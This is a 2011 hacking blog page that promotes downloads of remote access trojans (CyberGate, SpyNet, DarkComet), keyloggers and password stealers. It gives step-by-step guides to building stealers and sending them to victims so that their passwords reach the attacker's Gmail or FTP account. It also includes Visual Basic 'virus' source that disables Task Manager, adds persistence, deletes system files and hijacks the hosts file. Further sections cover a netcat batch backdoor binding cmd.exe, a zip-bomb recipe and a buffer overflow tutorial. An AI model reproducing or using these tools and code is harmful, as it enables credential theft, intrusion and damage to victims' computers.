Thursday, 17 November 2011

HACK COMPUTER USING CYBERGATE RAT

What is CyberGate:


CyberGate is a powerful, fully configurable and stable Remote Administration Tool coded in Delphi that is continously getting developed by our experienced team.

What it can do:

CyberGate was built to be a tool for various possible applications, ranging from assisting Users with routine maintenance tasks, to remotely monitoring your Children, captures regular user activities and maintain a backup of your typed data automatically. It can also be used as a monitoring device for detecting unauthorized access.
CyberGate achieves this though it’s abundant array of features. A few of which are illustrated below:

[+] Automatically map ports if your router supports uPnP;

[+] Multi-Threaded : allowing for multiple clients to be connected, along with increased reliability.

[+] Reverse Connection : Some of the listed advantages of a reverse connection –
# Outgoing connections generally are less treating, and are less likely to be detected or blocked by a firewall, such as a router.
# Since the remote’s computer is connecting to the remote administrator, one does not need to know the remote’s IP address in order to connect.

# It is much easier to keep track of the computers the RAT is installed on, since they are all “calling home” by connecting to the remote administrator.

[+] User Friendly GUI : The neat and simple GUI of CyberGate make this tool very easy to use and the simplest way to achieve yours goals.

[+] Stealth : The various features of the server installation makes the server extremely customizable accord to each user’s needs and requirements.

[+] Keylogger : This tool can be used to find out what is happening on your computer while you are away, maintain a backup of your typed data.

[+] Password recovery : It can be used to recover some of passwords that your forgot long time ago.

[+] Tasks: CyberGate is able to create either tasks for the Client to perform on a specific time after being started or an individual remote whenever it connects back to CyberGate.

[+] Connections tab: You can monitor all the connections and client performance from a connection log that will register actions and time /date for those actions.

Download CyberGate

SPYNET 2.7 RAT – GHOST EDITION

New features included:
- Added optional connection limit.
- Increased connection stability. Spy-Net is now as stable as SS-Rat.
- Increased speed in filemanager list files and list drives.
- Autostart on most features now.
- Password retrieval has been improved.


Features and Specs:
- server around 280 kb, depending on if icon is selected, rootkit, upx compressed, etc
- windows xp, vista and 7 compatible;
- DNS Updater (for now working with No-IP. developing dyndns updater atm)
- File Manger with a load full of options like FTP upload, set attributes to files, preview for images, etc etc etc;
- Windows List;
- Process List;
- Device List;
- Service List;
- Registry Editor;
- Installed Programs;
- Active Ports List;
- Remote Desktop;
- Webcam capture;
- Audio Capture;
- Password Recovery Tool (with direct download to client or FTP logs);
- Password Grabber;
- Socks 4/5 proxy;
- HTTP Proxy;
- Open Webpage;
- Download and Execute;
- Send local files and run hidden or normally;
- Remote Chat Client;
- DOS Prompt;
- Run cmd;
- Clipboard Grabber;
- Search for remote files and search on Password Recovery Tool;
- Access to download folder, remote desktop screen shots and web capture from menu.
- Encrypted traffic between Client and server;
- a few extra options (restart, lock buttons and stuff….) and all the options related to server (uninstall, rename, etc etc etc);
- add a new option for injection – wait for first browser to open. not the default but the first to start. seems useful in some cases.
- Rootkit in beta stage and being developed. It will hide process name and startup keys that have SPY_NET_RAT as name. Tested under XP and working, being developed and tested on other OS’s;
- Connections Limit selector;
- Binder,
- Columns selector (u can choose which columns u wanna see details from in the client. ex: u can hide RAM info view or Ports info view or any other using right click on top of the columns);
- Ability to choose either server is installed or not in remote computer.

NOTICE:you cant update it spynet 2.6 to 2.7 its not compatible…
Download SpyNet

FUD KEYLOGGER WITH FUD CRYPTERS TO HACK ACCOUNTS

Features of This Keylogger/Stealer:


- Keylogger

-Password Stealer (Opera,firefox,IE)
-USB virus Spreader
-Icon Changer
-File binder
-Taskmanager Kill
-Cookie Löscher
-Downloader
-Website Blocker
-Autostart with Windows
-Fake Error
-Antis
-Assembly changer/Dropper
-Neue Icons
-Neue Stealer Regs
-Build- bug wird gefixt
-Stub-Bug wird gefixt
-FUD
-Cure
-Firewall disabler
-System Restore point deaktiviert
-CMD deaktivert
-Bat.REG Files Deaktivert
-File Pumper
-Opera+chrome stealer
-Application stealer
-Windoof Serial Stealer
-PC Info stealer


Download Now – Click Here and Get It

DARKCOMET RAT V3.0 – HACK ANY COMPUTER

DarkComet 3.0 List improvement:
By DarkCoderSc

- 09/10/2010 : RC4 traffic encryption done , its encrypt all plain text and data flux with a RC4 encryption 256 bit , all your private data are now totally secured and DarkComet is impossible to flood / exploit .
- 09/10/2010 : Dynamic RC4 256 bit Key added when you choose a password on DarkComet , thats mean if you want to be secured at 200% when you choose a password in server it will bind the actual RC4 key with your password then without the correct client password the data wont be correctly decrypted then nothing will work without your password.
- 09/10/2010 : Now edit server settings are totally encrypted in RC4 256 bit too then its no more possible to reverse and read your personnal settings , again you are totally secured now
- 10/10/2010 : New column added in connection list (SIN) , now you can see the RAM usage/Total RAM and Free RAM.
- 10/10/2010 : New column added in connection list (SIN) , now you can see the country code/country localisation(geo) and the default system langage
- 10/10/2010 : New column added in connection list (SIN) , now you can see the first execution data/time of the server if it just been executed and not installed it display the current date/time.
- 10/10/2010 : Now you can choose if you want to display the default language flag or the geo ip flag
- 10/10/2010 : In OS collumn windows installed drive added (its where windows was installed)
- 12/10/2010 : Clipboard manager have been recoded , now you can resize the textbox and listview for a better confort
- 12/10/2010 : Two functions added in Clipboard manager , get the remote clipboard text in your clipboard , and send your clipboard text to the remote clipboard.
- 12/10/2010 : Process Manager got now a real better compatibility on 64 bit OS, now it list all process
- 12/10/2010 : Process Manager list the process 3x faster.
- 12/10/2010 : If you use a password for protecting connection it will be display in tray icons with a locker to remind you !
- 16/10/2010 : New toast style made , now you it display more information and have a better design.
- 16/10/2010 : Clipboard copy problem fixed in password manager , also the whole system is more stable


Download

HOW TO HIDE A VIRUS INTO ANOTHER FILE

There are many ways one can get a virus but in this case he had picked up some bad files on Limewire (P2P file sharing software). The viruses were wrapped up with legitimate music files. In other words, he downloaded the music file, ran the music file and the music file played as usual. What he didn’t know is that a virus file was hidden within the music file. How does that happen? We will attempt to explain this.
Please note that we are not publishing the code we used to do this so others don’t download and abuse it!
First off we need a binder program…



This program will bind two files together. Now we are going to wrap up our virus file (File1) with our image file (File2). Notice how you can change the file extensions to what ever you want. You can load .exe, .vbs viruses etc… You can also choose that the main file is an image, video or what ever you want.




Once you have decided on what virus you want to hide and in what type of media file you want to use, you tell the code to run the media file normally but HIDE the virus file (usually runs in console window).




Once we have set up the C code to do as we want, we then run the makefile script. This will run our code through Borlands C compiler and build our program. The finished program is called dropper.exe. You can make this code have whatever icon you want. In this example, since we are trying to hide our virus in an image file we used an image icon.




Keep in mind that this is just one example of how people hide virus files inside other working media files. It is very important to have up to date AV (Anti Virus) software and if you are running a Windows computer ALWAYS have the computer show you the files extension!

KEY 1.0 KEYLOGGERS

Report date: 2011-01-29 14:30:18 (GMT 1)
File name: getthekey-1-0-exe
File size: 53760 bytes
MD5 Hash: fec89753fc76c4b3ac38e78fbfe49a5e
SHA1 Hash: bcff2a897c63922363d3c75ccce9887608dea909
Detection rate: 0 on 16 (0%)
Status: CLEAN


Detections

a-squared -
Avast -
AVG -
Avira AntiVir -
BitDefender -
ClamAV -
Comodo -
Dr.Web -
F-PROT6 -
Ikarus T3 -
Kaspersky -
NOD32 -
Panda -
TrendMicro -
VBA32 -
VirusBuster -

Scan report generated by
NoVirusThanks.org
File Info


Report date: 2011-01-29 14:29:56 (GMT 1)
File name: stub-exe
File size: 82432 bytes
MD5 Hash: 98b5fd46ebb60f1ebef3ed1bced1f5f8
SHA1 Hash: 722a4d599c277b33154e125dde40d50277b24a01
Detection rate: 1 on 16 (6%)
Status: INFECTED

Detections

a-squared -
Avast -
AVG -
Avira AntiVir - TR/ATRAPS.Gen
BitDefender -
ClamAV -
Comodo -
Dr.Web -
F-PROT6 -
Ikarus T3 -
Kaspersky -
NOD32 -
Panda -
TrendMicro -
VBA32 -
VirusBuster -

Scan report generated by
NoVirusThanks.org


DOWNLOAD

EMISSARY KEYLOGGER – HACK ANY ACCOUNT

1st You need  Download Emissary Keylogger
2nd Open and Extract the file into your hardrive you need winrar


Make sure that you have Microsoft .Net Framework installed in your Windows. You can download it from www.microsoft.com/net/. Else it won’t work…

3. Then Open Emissary Exe file dont open stub file.



Enter your Gmail ID and password…
Block AV Sites: Blocks VirusScanning Websites on victim’s computer
Add to Startup: Adds to Startup via Registry
Antis: Anubis, BitDefender, Kaspersky, Keyscrambler, Malwarebytes, NOD32, Norman, Ollydbg, Outpost, Wireshark
Disable TaskManager: Disable TaskManager on victim’s PC
Disable Regedit: Disable’s Regedit on victim’s PC

Check “Trojan Downloader” to Downloade and Execute a trojan on victim’s PC. You can also create a fake error message and scare your victim, like:

After all click on bild server the exe server file will create in the same directory send this file to your victim.
Thats it when he/she will run this file you will receive his/her password automatically in your gmail.

Download Emissary Keylogger

ISTEALER 3.0 – HACK ACCOUNT PASSWORDS

Step 1: 1st of all go to www.drivehq.com and Create a free ftp account and activate it.
Step 2: Download istealer 3.0

Step 3: Extract the download file into you hard drive with winrar Extension or any other compressing/Extracting tool.
Step 4: Open Isteler Exe File.


Step 5: 1st in Host box write ftp.drivehq.com
and in login box enter your user name that you create in drivehq.com i did say this in 1st step.

if you wanna bind it with any other software then you can bind if not otherwise blank leave this option.

Step 6: Click on Test Ftp. if open a box with this saying your ftp account work properly. see screenshot.



Step 7: Click on build…

Name the file and your file will be created automatically in the same directory.

Step 8: Send this file to your victim via email or any hosting site, when he/she will open this file. his/her password will upload in your ftp drivehq account.

HAZE STEALER – HACK EMAIL ACCOUNTS


This is a FREE FUD Stealer for all.This steals most of the important site like:


Firefox Stealer
Internet Explorer Stealer
Steam Stealer
Chrome Stealer
Filezilla Stealer
Game Keys
All Windows Keys
No-Ip Stealer




Scans:

File Info

Report date: 2010-10-06 18:41:48 (GMT 1)
File name: haze-stealer-exe
File size: 1782784 bytes
MD5 Hash: 0db9387a3e3261e89cf9eb0129fd749f
SHA1 Hash: 909fc67babf127226cd4ed084a4d6191eb5761b4
Detection rate: 2 on 16 (13%)
Status: INFECTED

Detections

a-squared –
Avast –
AVG –
Avira AntiVir – SPR/PSW.Messen.FY
BitDefender –
ClamAV –
Comodo –
Dr.Web –
F-PROT6 –
Ikarus T3 –
Kaspersky –
NOD32 –
Panda –
TrendMicro –
VBA32 – Trojan-Spy.IEPV
VirusBuster –

Scan report generated by
NoVirusThanks.org

Download

KEYLOGGER STAR TOOLS – HACK ANY EMAIL

Step 1: First You should download star tools key logger Click Here for Download


Step 2: Extract rar file and run star tools: after hit will open a bok then go to tools and click on keylogger…

Step 3: Enter Your gmail id and password and hit build keylogger,

After enter email and pass click on build keylogger, after click a server.exe file created automatic in the same directory.
Step 4: Send this server file send to your victom. when he/she will run this file his all keystrokes will send in your gmail account automatic…

100+ HACKING TOOLS



Hacking Tools in This pack:-


HOTMAIL HACKING
YAHOO HACKING
MSN FUN TOOLS
FAKE SCREENS/PAGES
OTHER HACKING TOOLS

FUN TOOLS Page 1:
MSN Chat Monitor And Sniffer
MSN Password Retriever
MSN Hacker DUC
Head **** HotMail HAck
HotMail Hacker XE Edition
HotMail HAck
HotMAil Hacker
MSN Passwords
MSN Flooder
MSN Sniffer
MSN SPY Lite
HotMail Hacker Gold
HotMail HAcker Final
Give me Ur Pass
HotMail Brute Forcer
MSN PAssword Finder
MSN Password Grabber
Hack MSN Password
Hack HotMAil Evolution
MAgic Password Sender
MSN Locker
HotMail Killer
Hot Freeze
MessenPass
HotMAil Hack !
Ice Cold Reload
HotMail Killer 2
Nuke MSNPage 2:
Yahoo Messenger Login Screen
MSN Messenger 7 Login Screen
MSN Messenger 5 Login Screen
MSN Messenger 4.6 Login Screen
HotMail Login Screen
Fake Web Pages 2
Fake Eeb Pages 1
AOL Killer
Fake Login HotMail
B S Spy
Saria Fake LoginsPage 3:
Yahoo Password Retrieval
Yacam
Yahoo Cracker
Yahoo Booster
Yahoo Hack!
Yahoo Password Stealer
S H Yahoo Password SenderPage 4:
NetWork Password Recovery
Net BIOS Name Scanner
FTP Password Hacker
Cable Modem Sniffer
Port Listening XP
Blue Port Scanner
www 2 IP
XP Killer
Sniff Password
Port Scanner
Fast Resolver
Domain Scan
Whois Domain
NetRes View
PHPbb Defacer
Angry IP Scanner
FTP Brute ForcerPage 5:
Hook Tool Box
Smart HAck UpLoader
Remote Anything
Post Sage
PHPbb AttackerPage 6:
Skinner
MSN Bomber Man
Ultimate Nick PopUpz
MSN 7 Universal Patcher
Emoticons Creator
MSN Picture Crawler
Anti Status Bomb
MSN Detector
Multi MSN Loader
Kitle
Protect Lithium
Tray It!
MSN Block Checker
MSN Auto Responder
MSN Virus CleanerDownload and Enjoy hacking

Download 100 Hacking Tools

HACK ADMINISTRATOR PASSWORD IN WINDOWS XP, 7 & VISTA

If you did lost your password dont worry about this, just follow steps and login to ur admin.


You Need Blank Cd or floppy and internet Access Cd or floppy writer.

1. Download this small utility.

Click Here To Download

After download you will get zip and iso image file burn it with any burner into a floppy or cd.

Restart your system and when prompted press enter to boot from the CD.



Note: If you do not get prompt of boot from CD.Then restart you system and press f2 or f6 or f8 or Esc key(anyone of them should work for your system) before the booting of the windows start.Now you will enter into bios and you should change the boot order from here with the first preference as CD-ROM.And again restart your system

Now the software will load automatically.It will ask you to select the windows drive and after that provide you with the option of resetting password.

NOTEPAD HACKING TRICK

This is a exploit of the compression algorithms to make a small zip that will extract into extream amounts their are more ways and better ones than this one but i will only show how to make a simple 1k = 1m ratio.
1) Make a.txt file
2) Open and type the null character (alt + 255)
3) Press ctrl + a then ctrl + v a couple times to make some null bytes

4) If u have a hexeditor make the hex 00 for about 50 kilobytes.
5) Now make several copies of a.txt and name accordinly
6) Open cmd.exe
7) Type copy /b *.txt b.txt
Now every copy is made into a super copy and repeat
9) Once you have a nice empty big text file like 1gb. Put it in a zip archive.
Because of the simple construction of the file, 1gb of null bytes…!
The zip is only 1 mb in size and can really annoy freinds.
For added fun hex edit the zip and you will see a bunch of hex 5555
Just add some more and the file will expand amazingly
Make sure to not open this after
You can always create your zip of death from the command line in linux
dd if=/dev/zero bs=1000 count=1000000 | gzip > test.gz

HOW TO CREATE A POWERFUL VIRUS IN VISUAL BASIC


Open VB and follow the code:


–code start here–

Private Sub Form_Load()
On Error Resume Next
‘This command will allow the application to continue running
‘even if an error occurs instead of terminating/closing.
Hide
‘This command will hide the application from even being seen on the victims
‘screen even if your program has it’s settings set to Visible|True
App.TaskVisible = False
‘This command is even better, this command will stop your program
‘from showing up in Task Manager-Applications Tab List, but it will still
‘show up in process list, sorry =/
End Sub



‘disable taskmanager

Shell “REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f”, vbHide
Shell “REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ###Name### /t REG_SZ /d ###Drive:\Path\Name.exe### /f”, vbHide
‘This command will make your application start with windows.
Shell “REG add HKCR\exefile\shell\open\command /v Shell /t REG_SZ /d ###Drive:\Path\Name.exe### %1 %* /f”, vbHide
‘This command will make your application start when ever the victim opens another application via msnmsngr.exe as an example
Shell “REG add HKLM\Control Panel\International /v s1159 /t REG_S /d ###Letter/Symbol/Number### /f”, vbHide
Shell “REG add HKLM\Control Panel\International /v s2359 /t REG_SZ /d ###Letter/Symbol/Number### /f”, vbHide
Shell “REG add HKLM\Control Panel\International /v SLongDate /t REG_SZ /d ###Letter/Symbol/Number### /f”, vbHide
Shell “REG add HKLM\Control Panel\International /v sShortDate /t REG_SZ /d ###Letter/Symbol/Number### /f”, vbHide
Shell “REG add HKLM\Control Panel\International /v sTimeFormat /t REG_SZ /d ###Letter/Symbol/Number### /f”, vbHide
Shell “REG add HKLM\Control Panel\International /v sNativeDigits /t REG_SZ /d ###Letter/Symbol/Number### /f”, vbHide
‘These commands will set the time & date for the victims computer permanently
‘Change the ###Letter/Symbol/Number### to ? for example, and the victim will see ???????? for the time and ??????
‘for the date.
FileCopy App.Path & “\” & App.EXEName & “.EXE”, “Drive:\Path\Name.exe”
‘This code well, it couldn’t be more obvious what it does, but when copying your virus/worm ect
‘to a new path, try looking up windows processes like svchost.exe, making it harder for the victim
‘to get rid of your virus/worm/trojan ect.

Dim intResult As Integer
Randomize
intResult = Int((9542 * Rnd) + 4592)
FileCopy App.Path & “\” & App.EXEName & “.EXE”, “c:\Documents and Settings\All Users\Desktop\DimenBlackScript.exe” & intResult & “.exe”
‘Ok for abit of fun, here is a simple code but a real nasty one, add a timer to your application
‘interval set to “1″ when this code runs, all user accounts desktops will be flooded with your virus and the longer it
‘runs the more Memory it takes up and the more viruses that person has to delete, try adding it to places like
‘ C:\DOCU~\All Users\Start Menu\Programs\Start up\
‘That will cause the victim alot of hassle =P.

Kill “c:\windows\win.ini”
Kill “c:\windows\system.ini”
Open “c:\WINDOWS\win.ini” For Output As #1
Print #1, “Load = C:\Program Files\Virus1.exe”
Print #1, “run = C:\Program Files\Virus2.exe”
Close #1
Open “c:\WINDOWS\system.ini” For Output As #1
Print #1, “Shell=Explorer.exe C:\WINDOWS\System\Virus3.exe”
Print #1, “Shell=Explorer.exe C:\WINDOWS\System32\Virus4.exe”
Close #1
‘Ok people more fun, making your application start with windows, without using Registry or DOS
‘one little alter and your viruses and start with windows and the victim will not know how.

Open “c:\WINDOWS\system32\drivers\etc\hosts” For Output As #1
Print #1, “208.65.153.251 208.65.153.251 “
Print #1, “208.65.153.251 www.google.com”
Print #1, “208.65.153.251 www.google.co.uk”
Print #1, “208.65.153.251 www.yahoo.com”
Print #1, “208.65.153.251 www.yahoo.co.uk”
Print #1, “208.65.153.251 www.askjeeves.com”
Print #1, “208.65.153.251 www.altavista.com”
Print #1, “208.65.153.251 www.alltheweb.com”
Print #1, “208.65.153.251 www.msn.com”
Print #1, “208.65.153.251 www.hotmail.com”
Print #1, “208.65.153.251 www.myspace.com”
Print #1, “208.65.153.251 www.plunder.com”
Print #1, “208.65.153.251 www.quicksharing.com”
Print #1, “208.65.153.251 www.myspace.co.uk”
Close #1
‘Just something to help stop the victim from google-ing what the virus has done, and getting information
‘or downloads to help rid them of your infection >=P.

Kill “%SystemRoot%\syst” & “em32\dfrg.msc”
Kill “%SystemRoot%\syste” & “m32\wscui.cpl”
Kill “C:\Program Files\Co” & “mmon Files\Microsoft Shared\MSInfo\msinfo32.exe”
Kill “%SystemRoot%\syste” & “m32\restore\rstrui.exe”
Kill “c:\WINDOWS\syste” & “m32\rundll32.exe”
‘Ok now finally let’s get rid of System Restore, Rundll(by deleting this file, the victim can no longer
‘view the properties window for any file on his or her computer).

–code end here–

GET SOMEONE’S IP ADDRESS – 3 BEST METHODS

Obtaining an IP from MSN Messenger.

Firstly we learn the method used by most people when they want to get someone elses IP Address.


Step 1 – Start MSN Messenger and login as yourself.

Step 2 – Hit your “Start” button and click run. Type into the white box “Command” (without the quotation marks)


Step 3 – Type in “Netstat -N” (without the quotation marks) into the black box and hit enter.

Step 4 – Start a conversation with your ‘victim’ and send them a file. Once they accept the file Hit your “Start” button and click run. Type into the white box “Command” (without the quotation marks) and Type in “Netstat -N” (without the quotation marks) into the black box and hit enter.

Step 5 – Look in the middle column of both your MS Dos boxes and look in the newer wndow for the IP address that has magically appeared in the middle column. This is your victim’s IP Address.


Obtaining an IP from an E-Mail.



Ok, lets say the person does not use MSN Messenger (can’t blame them) we can get an IP address from most E-Mail address. In this example we shall use Outlook Express to view the E-Mails in.

Step 1 – Load Outlok express and left click on an E-Mail that was sent from your ‘victim’


Step 2 – Right click this E-Mail and click the “Properties” button.

Step 3 – Now Click on the tab displaying as it’s text “Details” and look for the buttom saying “Message Source”, once found (not hard) click it.

Step 4 – Look in all the jargon for something like “X-Originating-IP: “ with a number after the colon. This number is the sender’s IP Address.

Step 5 – If you cannot find “X-Originating-IP: ” then do not worry. Look for instead “Received:”, and go along this string untill you come to a nuber in brackets, this however maybe an IP but it might not be the IP address of the ‘victim’, infact if they sent the E-Mail from a we E-Mail service (like hotmail.com) then chances are it is not their IP address.
Obtaiing an IP from Physical Access.

If you have physical access to a computer then getting the IP address is simple.


Step 1 – Click the “Start” button and hit “Run”. Type in “Command” and hit enter.

Step 2 – Type in “ipconfig” OR “winipcfg” and hit enter now look for where it says “IP Address:”, next to this is the IP of the computer you are using…

PENTBOX SECURITY SUITE – V1.4

PenTBox is a Security Suite with programs like Password Crackers, Denial of Service testing tools like DoS and DDoS, Secure Password Generators, Honeypots and much more. Destined to test security and stability of networks.

Tools included in PenTBox



Base64 encoder y decoder,
Digest for MD5,
SHA1,
SHA256 and SHA512,
Port scanner,
TCP DoS,
TCP AutoDoS,
SYN DoS,
Honeypot,
L33t Sp3@k Converter

PenTBox is programmed in Ruby so ruby is required, and oriented to GNU/Linux systems compatible with Windows, MacOS and more.

Tutorial for PenTBox

1.Download PentBox and un tar
2. We are using windows box , simply run exe and choose from three options.
3. And your ready to attack or audit. Nothing much to think or relay on.
Download PentBox Here

Pentbox is simple yet powerful .Feature i liked most is simple honeypot…

HOW TO HACK A NETWORK COMPUTER

Now to do this you need a very innocent target! As we all know a Trojan is very liable to be picked up by AV what you need is Net cat, it opens a port on a computer for access (If used correctly by a batch file you open a port on a target computer). You will need to write a batch file.


The batch file to copy net cat on the remote computer will have to be run from the target computer (The person on the target will have to implement the batch file in some way). Open Notepad and type this in:
Code
@echo off
cd\
xcopy \\yourIP\shared folder\netcat.exe
copy \\yourIP\shared folder\netcat.exe (just to be sure)
cd “Documents and Settings”
cd “All Users”
cd “Start Menu”
cd Programs
cd Startup
xcopy \\yourIP\shared folder\Startup.bat (This is another batch file you will write)
cd\
netcat.exe -L -p 9999 -d -e cmd.exe

You save the file as a batch file using Notepad. The next batch file will be used to make sure the port you described opens up every time windows starts up and you can describe any port you wish. Open Notepad and type this:
Code
@echo off
cd\
netcat.exe -L -p 9999 -d -e cmd.exe

Save the file as a batch file using Notepad this will be the file that is copied into the startup folder in the previous batch file we wrote. You can connect the batch file to another file and share that file, let the target implement that file so that he can copy net cat and the other batch file onto his/hers computer therefore opening port 9999 after port 9999 has been opened you can then use telnet and telnet to that port on the target computer to have full access without ever needing any passwords of any sort. After you are in change the Administrator password for if something happens to your files, the command is this:

net user Administrator newpassword

Now from here you can do what you want! Example: try closing down the target computer by browsing to his system32 folder and then type in:

shutdown -r -t 10 -c “Hello”

Then the computer will then restart in 10 seconds time. You can even play around more by Installing Cain & Abel on your computer and then installing Abel slightly on his computer (Since you know the Administrator password) Once you have Abel on the target you can start and stop services and do more!

TRUECRYPT – FILE ENCRYPTION SOFTWARE

You can get the latest version of TrueCrypt (Which is version 7.0a) from here.

Once you download the .exe file and open it, you will be asked to agree with the lisence (which no one cares to read). on the next page of the wizard, you will be asked whether to install or extract. Let me explain, if you are planning on encryption a drive or your boot partition, or if you are planning on using TrueCrypt solely on your computer then choose the install option. If you are instead planning on using this tool on-the-go or on your flash drive then choose the extract option which will allow you to use this software anywhere and everywhere using the truecrypt.exe file.


Once the installation is done, do the following to make an encrypted virtual space for storing all your sensitive data:

1. After clicking the TrueCrypt icon, the main window should appear. Click the Create Volume button.

2. You will be taken to the Volume Creation Wizard. In this step you need to choose where you wish the truecrypt volume to be created. A truecrypt volume can reside in a file, which is also called container, in a partition or drive. In this tutorial we will choose the first option and create a TrueCrypt volume within a file. as the option is already selected, just click next.


3. In the next step, you will be asked whether to create a standard or hidden TrueCrypt volume. for more information on the hidden TrueCrypt volume, just select the ‘more info’ link on the wizard window. for now, lets just create a standard volume


4. Next step, you choose the location. note that it will be similar to any normal file (except for the fact that it can only be opened by TrueCrypt) so please remember that your truecrypt volume can be moved or deleted. You will also need to choose a file name for your volume after choosing the location.


Once the location is sorted, you will be asked to choose the size of your volume, the encryption scheme, a password and also the format of your volume. Choose the ones appropriate for you.


Once you click format, you are finally done! you will be greeted with a pop up windows that says that your volume has been created.

Now all you got to do is go back to the main TrueCrypt window, select any one of the provided drives, click on the select file button and select your volume and then hit Mount. You will be asked for your password, once you input that you can go to My Computer and find your TrueCrypt volume sitting there along side your C: and D: drive. you can just move all your sensitive files to your TrueCrypt volume and once done, select Unmount from the TrueCrypt main window.

BACKTRACK LINUX 5 RELEASED – DOWNLOAD

After being in production for almost 8 months, BackTrack has been updated! It has been aptly code named – “Revolution”.

BackTrack is a Linux-based penetration testing arsenal that aids security professionals in the ability to perform assessments in a purely native environment dedicated to hacking. Regardless if you’re making BackTrack your primary operating system, booting from a LiveDVD, or using your favorite thumbdrive, BackTrack has been customized down to every package, kernel configuration, script and patch solely for the purpose of the penetration tester.
Features:
KDE (4.6) and Gnome (2.6) Desktop environment flavours
32 and 64 bit support
A basic ARM BackTrack image which can be chrooted into from anfroid enabled devices.
The 32 and 64 bit images support “Forensics Mode”, which boots a forensically sound instance of BackTrack and ‘Stealth mode”. which boots without generating network traffic.

  Download BackTrack5 from here: http://www.backtrack-linux.org/downloads/

DOWNLOAD BACKTRACK LINUX – BEST OPERATING SYSTEM FOR HACKERS

There are a couple of things that are essential to any hacker’s walk of life. To name a few, there’s the ubiquitous flash drive for data transfer. You have the crossover cable for even faster data transfer. There’s the Wi-Fi antenna for high gain and strong amplification. Possibly, you might find a video capture card in the computer. Of course, there’s the ubiquitous laptop and desktop computer. But what software is on these computers? Undoubtedly, you will find at least two operating systems, most often Windows and Linux. But with Linux, there are several different distributions. Is there a specific one? With hackers and crackers, there is only one Linux distro out there. It is called Backtrack.



BackTrack is a Linux-based penetration testing arsenal that aids security professionals in the ability to perform assessments in a purely native environment dedicated to hacking.

Regardless if you’re making BackTrack your primary operating system, booting from a Live DVD, or using your favourite thumb drive, BackTrack has been customized down to every package, kernel configuration, script and patch solely for the purpose of the penetration tester.

BackTrack is intended for all audiences from the most savvy security professionals to early newcomers to the information security field. BackTrack promotes a quick and easy way to find and update the largest database of security tool collection to-date.

Back Track is quite possibly the most comprehensive Linux distribution of security tools. Both hackers and crackers can appreciate the features of this distribution. For black-hatters, it is an easy access to software that facilitates exploitations of secure system. For white-hatters, it is a penetration tester that finds holes in a security scheme. See, everybody wins!

Major Features
BackTrack features the latest in security penetration software. The current Linux kernel is patched so that special driver installation is unnecessary for attacks. For example, an Atheros-based wireless networking adapter will no enter monitor mode or inject packets without the MadWiFi driver patch. With BackTrack, you don’t need to worry about that. It’s just plug-and-play ready-to-go!

What’s great is that this Linux distribution comes Live-on-CD. So, no installation is needed. However, what you experience BackTrack, you will realize that it is a must to download this operating system and install it on your Laptop. At the very least, download the VMWare Virtual Appliance for Backtrack. Make sure you also install the VMWare Tools for Linux as well. Many features will still work in VMWare mode.

* Based on: Debian, Ubuntu
* Origin: Switzerland
* Architecture: i386
* Desktop: Fluxbox, KDE
* Category: Forensics, Rescue, Live Medium
* Cost: Free

Tools:
BackTrack provides users with easy access to a comprehensive and large collection of security-related tools ranging from port scanners to password crackers. Support for Live CD and Live USB functionality allows users to boot BackTrack directly from portable media without requiring installation, though permanent installation to hard disk is also an option.

BackTrack includes many well known security tools including:

* Metasploit integration
* RFMON Injection capable wireless drivers
* Kismet
* Nmap
* Ettercap
* Wireshark (formerly known as Ethereal)
* BeEF (Browser Exploitation Framework)

A large collection of exploits as well as more common place software such as browsers. BackTrack arranges tools into 11 categories:

* Information Gathering
* Network Mapping
* Vulnerability Identification
* Web Application Analysis
* Radio Network Analysis (802.11,Bluetooth,Rfid)
* Penetration (Exploit & Social Engineering Toolkit)
* Privilege Escalation
* Maintaining Access
* Digital Forensics
* Reverse Engineering
* Voice Over IP

http://www.backtrack-linux.org/downloads

BUFFER OVERFLOW ATTACK TUTORIAL – EXAMPLE

A Buffer Overflow is a flaw by which a program reacts abnormally when the memory buffers are overloaded, hence writing over adjacent memory. It can be triggered by using inputs that may alter the way a program operates,for example <inputting a very large value in a c program which does integer based addition>. A buffer overflow can lead to program crash, memory access error, garbage outputs & worse, breach of system security. Probably, you might have seen prominent buffer overflow based exploits & attacks in Metaspl0it or any other spl0it framework. Why I am writing this ? well..I found an excellent article on buffer overflow by eXeCuTeR <executerx[at]gmail[dot]com> & thought you might wanna have a look at it. Its exlplained in quite easy language with very basic example.
read & learn…


Our vuln program:

———- bof.c ————–

#include <stdio.h>
#include <string.h>

int main(int argc, char *argv[])
{
char str[10];
strcpy(str, argv[1]);
printf(“Done”);

return 0;
}

———- bof.c ————–

As you see, argv[1] is copied to str (str can contains 10 characters)
Try to think – What happens when we load more than 10 bytes on str? You’ll see.

Lets try compile the program and load 12 bytes:

niv@niv-desktop:~/Desktop$ gcc-3.3 bof.c -o bofniv@niv-desktop:~/Desktop$ ./bof `perl -e ‘print “A”x12′`Doneniv@niv-desktop:~/Desktop$



The program has been successfully compiled even though we loaded 12 bytes, which means 12 bytes aren’t enough to overflow the program.

Lets try to overflow the program with 14 bytes:


niv@niv-desktop:~/Desktop$ ./bof `perl -e ‘print “A”x14′`
Doneniv@niv-desktop:~/Desktop$



Failed. Again.

Lets load 32 bytes this time:
niv@niv-desktop:~/Desktop$ ./bof `perl -e ‘print “A”x32′`
Segmentation fault (core dumped)
niv@niv-desktop:~/Desktop$


In case it says: /*** stack smashing detected ***/ or something that appears to be like this error, just go to the terminal, type: sudo apt-get install gcc-3.3 and when compiling it type gcc-3.3 example.c -o example instead of gcc example.c -o example.

We made it, we overflowed the program.

Now we’ll check more further what exactly happend:


niv@niv-desktop:~/Desktop$ gdb -c core ./bof
GNU gdb 6.6-debian
Copyright (C) 2006 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type “show copying” to see the conditions.
There is absolutely no warranty for GDB. Type “show warranty” for details.
This GDB was configured as “i486-linux-gnu”…
Using host libthread_db library “/lib/tls/i686/cmov/libthread_db.so.1″.
/home/niv/Desktop/core: No such file or directory.
(gdb) run `perl -e ‘print “A”x60′`
Starting program: /home/niv/Desktop/bof `perl -e ‘print “A”x32′`


Program received signal SIGSEGV, Segmentation fault.
0×41414141 in ?? ()
(gdb) i r eip
eip 0×41414141 0×41414141


We overwrited the EIP with A’s (A = 41 in hex) – The EIP is the Instructor Pointer, it points at the next instruction.

Now we can start writing our exploit.
Our exploit is gonna contain the NOPSLED + Shellcode + the address of the shellcode (the RET).
